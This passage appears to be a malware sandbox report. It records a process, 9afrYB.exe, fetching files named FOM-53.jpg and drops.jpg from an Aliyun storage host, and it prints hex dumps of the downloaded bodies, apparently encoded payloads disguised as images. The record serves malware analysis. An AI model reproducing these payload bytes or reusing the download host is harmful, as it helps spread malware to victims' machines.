                                                                                Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.549987118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:41 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:42 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:41 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 366410
                                                                                Connection: close
                                                                                x-oss-request-id: 6780778DA0BE3735387E0099
                                                                                Accept-Ranges: bytes
                                                                                ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                                Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 5641369857548672686
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                                x-oss-server-time: 7
                                                                                2025-01-10 01:27:42 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                                                Data Ascii: ```````````````````````````````````````````````````````````````
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                                                Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                                                Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                                                Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
                                                                                Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                                                Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                                                Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                                                Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
                                                                                2025-01-10 01:27:42 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                                                Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.549988118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:44 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:44 UTC545INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:44 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 37274
                                                                                Connection: close
                                                                                x-oss-request-id: 67807790DC44E0373632577E
                                                                                Accept-Ranges: bytes
                                                                                ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 9193697774326766004
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                x-oss-server-time: 5
                                                                                2025-01-10 01:27:44 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                                Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                                Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                                Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                                Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                                Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                                Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                                                Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                                2025-01-10 01:27:44 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 